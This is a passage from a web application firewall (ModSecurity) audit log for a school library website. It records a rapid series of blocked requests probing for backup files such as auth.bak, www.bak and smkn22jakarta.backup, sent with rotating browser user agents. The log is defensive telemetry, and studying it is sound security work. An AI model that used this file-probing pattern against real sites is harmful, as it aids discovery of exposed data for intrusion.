Gecko) Chrome/61.0.3163.98 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 152600662 --f15cd93a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f15cd93a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883199800 1812 (- - -) Stopwatch2: 1747543883199800 1812; combined=642, p1=306, p2=309, p3=0, p4=0, p5=27, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f15cd93a-Z-- --6475451e-A-- [18/May/2025:11:51:23 +0700] aClnS_ypzAd0elWOk7o8ygAAABg 103.236.140.4 56796 103.236.140.4 8181 --6475451e-B-- GET /vb.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0.1) Gecko/20100101 Firefox/63.0.1 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151093381 --6475451e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --6475451e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883204538 1585 (- - -) Stopwatch2: 1747543883204538 1585; combined=660, p1=346, p2=285, p3=0, p4=0, p5=28, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6475451e-Z-- --940bc456-A-- [18/May/2025:11:51:23 +0700] aClnS_ypzAd0elWOk7o8ywAAAAU 103.236.140.4 56796 103.236.140.4 8181 --940bc456-B-- GET /master.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36 OPR/53.0.2907.106 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 152600669 --940bc456-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --940bc456-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883210890 1563 (- - -) Stopwatch2: 1747543883210890 1563; combined=624, p1=307, p2=290, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --940bc456-Z-- --3aebc368-A-- [18/May/2025:11:51:23 +0700] aClnS_ypzAd0elWOk7o8zAAAAAY 103.236.140.4 56796 103.236.140.4 8181 --3aebc368-B-- GET /2012.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1; rv:52.2.1) Gecko/20100101 Firefox/52.2.1 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 152600678 --3aebc368-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --3aebc368-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883223683 1798 (- - -) Stopwatch2: 1747543883223683 1798; combined=631, p1=304, p2=301, p3=0, p4=0, p5=26, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3aebc368-Z-- --496cea53-A-- [18/May/2025:11:51:23 +0700] aClnS_ypzAd0elWOk7o8zQAAABM 103.236.140.4 56796 103.236.140.4 8181 --496cea53-B-- GET /media.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36 OPR/53.0.2907.106 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 110436772 --496cea53-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --496cea53-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883234011 2040 (- - -) Stopwatch2: 1747543883234011 2040; combined=832, p1=384, p2=418, p3=0, p4=0, p5=30, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --496cea53-Z-- --090d2b5b-A-- [18/May/2025:11:51:23 +0700] aClnS0PRqak7bVuUS6cS7QAAAIs 103.236.140.4 58354 103.236.140.4 8181 --090d2b5b-B-- GET /smkn22jakarta_sch_id.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36 OPR/53.0.2907.106 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 117360883 --090d2b5b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --090d2b5b-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883235250 2076 (- - -) Stopwatch2: 1747543883235250 2076; combined=853, p1=380, p2=447, p3=0, p4=0, p5=26, sr=108, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --090d2b5b-Z-- --ffddcd42-A-- [18/May/2025:11:51:23 +0700] aClnS_ypzAd0elWOk7o8zgAAAA8 103.236.140.4 56796 103.236.140.4 8181 --ffddcd42-B-- GET /asp.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 110436775 --ffddcd42-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ffddcd42-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883237242 1718 (- - -) Stopwatch2: 1747543883237242 1718; combined=699, p1=336, p2=334, p3=0, p4=0, p5=28, sr=70, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ffddcd42-Z-- --1095cf12-A-- [18/May/2025:11:51:23 +0700] aClnS_ypzAd0elWOk7o8zwAAAAI 103.236.140.4 56796 103.236.140.4 8181 --1095cf12-B-- GET /com.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:60.3.0) Gecko/20100101 Firefox/60.3.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151093390 --1095cf12-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1095cf12-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883246085 1664 (- - -) Stopwatch2: 1747543883246085 1664; combined=688, p1=353, p2=307, p3=0, p4=0, p5=28, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1095cf12-Z-- --8f1aec6d-A-- [18/May/2025:11:51:23 +0700] aClnS_ypzAd0elWOk7o81AAAABE 103.236.140.4 56796 103.236.140.4 8181 --8f1aec6d-B-- GET /smkn22jakarta.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36 OPR/53.0.2907.99 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 113175814 --8f1aec6d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --8f1aec6d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883277778 1966 (- - -) Stopwatch2: 1747543883277778 1966; combined=732, p1=315, p2=391, p3=0, p4=0, p5=26, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8f1aec6d-Z-- --f41f577f-A-- [18/May/2025:11:51:23 +0700] aClnS_ypzAd0elWOk7o81gAAAAs 103.236.140.4 56796 103.236.140.4 8181 --f41f577f-B-- GET /log.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36 OPR/55.0.2994.44 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 110436818 --f41f577f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f41f577f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883310134 1694 (- - -) Stopwatch2: 1747543883310134 1694; combined=702, p1=352, p2=322, p3=0, p4=0, p5=28, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f41f577f-Z-- --4aa99615-A-- [18/May/2025:11:51:23 +0700] aClnS0PRqak7bVuUS6cS7gAAAIQ 103.236.140.4 58354 103.236.140.4 8181 --4aa99615-B-- GET /2025.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:51.0.1) Gecko/20100101 Firefox/51.0.1 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151093435 --4aa99615-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --4aa99615-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883316367 2125 (- - -) Stopwatch2: 1747543883316367 2125; combined=759, p1=369, p2=360, p3=0, p4=0, p5=30, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4aa99615-Z-- --ade59a75-A-- [18/May/2025:11:51:23 +0700] aClnS0PRqak7bVuUS6cS8gAAAJQ 103.236.140.4 58354 103.236.140.4 8181 --ade59a75-B-- GET /2022.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 110436840 --ade59a75-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ade59a75-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883345739 1924 (- - -) Stopwatch2: 1747543883345739 1924; combined=718, p1=342, p2=349, p3=0, p4=0, p5=27, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ade59a75-Z-- --3bc4a550-A-- [18/May/2025:11:51:23 +0700] aClnS0PRqak7bVuUS6cS8wAAAJA 103.236.140.4 58354 103.236.140.4 8181 --3bc4a550-B-- GET /auth.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 117360921 --3bc4a550-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --3bc4a550-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883350379 1763 (- - -) Stopwatch2: 1747543883350379 1763; combined=719, p1=354, p2=338, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3bc4a550-Z-- --bf76a056-A-- [18/May/2025:11:51:23 +0700] aClnS_ypzAd0elWOk7o82wAAAA4 103.236.140.4 56796 103.236.140.4 8181 --bf76a056-B-- GET /2023.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 OPR/56.0.3051.43 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151224714 --bf76a056-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --bf76a056-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883358114 1687 (- - -) Stopwatch2: 1747543883358114 1687; combined=708, p1=342, p2=338, p3=0, p4=0, p5=28, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bf76a056-Z-- --bca82517-A-- [18/May/2025:11:51:23 +0700] aClnS0PRqak7bVuUS6cS9AAAAJY 103.236.140.4 58354 103.236.140.4 8181 --bca82517-B-- GET /www.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 152600732 --bca82517-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --bca82517-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883358283 1717 (- - -) Stopwatch2: 1747543883358283 1717; combined=692, p1=348, p2=312, p3=0, p4=0, p5=32, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bca82517-Z-- --728e0d7c-A-- [18/May/2025:11:51:23 +0700] aClnS0PRqak7bVuUS6cS9wAAAJE 103.236.140.4 58354 103.236.140.4 8181 --728e0d7c-B-- GET /smkn22jakarta.backup HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.5.0) Gecko/20100101 Firefox/52.5.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151093461 --728e0d7c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --728e0d7c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883403918 2116 (- - -) Stopwatch2: 1747543883403918 2116; combined=745, p1=366, p2=352, p3=0, p4=0, p5=27, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --728e0d7c-Z-- --a14ef045-A-- [18/May/2025:11:51:23 +0700] aClnS0PRqak7bVuUS6cS-AAAAIM 103.236.140.4 58354 103.236.140.4 8181 --a14ef045-B-- GET /joomla.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1; rv:52.0.2) Gecko/20100101 Firefox/52.0.2 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151224759 --a14ef045-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a14ef045-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883412119 1662 (- - -) Stopwatch2: 1747543883412119 1662; combined=711, p1=339, p2=344, p3=0, p4=0, p5=28, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: 